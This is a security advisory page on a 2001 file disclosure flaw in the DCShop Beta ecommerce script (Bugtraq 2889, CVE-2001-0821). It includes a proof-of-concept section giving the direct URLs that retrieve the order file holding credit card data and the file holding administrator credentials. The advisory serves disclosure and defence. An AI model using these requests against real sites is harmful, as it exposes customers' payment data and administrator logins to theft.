DCForum DCShop File Disclosure Vulnerability
BID:2889
Info
DCForum DCShop File Disclosure Vulnerability
| Bugtraq ID: | 2889 |
| Class: | Origin Validation Error |
| CVE: |
CVE-2001-0821 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 18 2001 12:00AM |
| Updated: | Jul 11 2009 06:56AM |
| Credit: | Reported by Peter Helms <[email protected]> on June 18, 2001. |
| Vulnerable: |
DC Scripts DCShop Beta 1.0 02 |
| Not Vulnerable: | |
Discussion
DCForum DCShop File Disclosure Vulnerability
DCShop is a GCI-based ecommerce system from DCScripts.
Under certain configurations, a beta version of this product can allow a remote user to request and obtain files containing confidential order data, including credit card and other private customer information, as well as the DCShop admnistrator login ID and password.
DCShop is a GCI-based ecommerce system from DCScripts.
Under certain configurations, a beta version of this product can allow a remote user to request and obtain files containing confidential order data, including credit card and other private customer information, as well as the DCShop admnistrator login ID and password.
Exploit / POC
DCForum DCShop File Disclosure Vulnerability
http://theTargetHost/cgi-bin/DCShop/Orders/orders.txt
http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt
http://theTargetHost/cgi-bin/DCShop/Orders/orders.txt
http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt